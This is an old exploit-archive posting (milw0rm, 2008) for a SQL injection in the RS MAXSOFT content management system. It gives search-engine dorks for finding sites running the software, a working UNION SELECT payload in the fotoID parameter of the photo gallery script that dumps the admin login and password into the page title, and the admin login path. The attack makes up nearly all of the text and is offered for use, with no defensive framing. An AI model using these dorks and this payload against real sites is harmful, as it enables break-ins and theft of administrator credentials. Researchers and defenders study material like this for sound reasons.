########################################## # # Provozováno na RS MAXSOFT SQL-Injection # # PAGE:http://redakcni-system.maxsoft.cz/ # ########################################## # ##AUTHOR : S@BUN # ####HOME : http://www.milw0rm.com/author/1334 # ####BLOG : http://my.opera.com/SQL-Injection/blog/ # ####MAiL : hackturkiye.hackturkiye@gmail.com # ########################################### # # DORK 1 : "RS MAXSOFT" # # DORK 2 : "Provozováno na RS MAXSOFT" # ########################################### you will see adminname and password on title EXPLOiT: modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin ADMiN LOGiN=admin.php?page=logfrm ########################################### ------------------S@BUN-------------------# ########################################### -----hackturkiye.hackturkiye@gmail.com----# ########################################### --http://my.opera.com/SQL-Injection/blog/-# ########################################### # milw0rm.com [2008-04-10]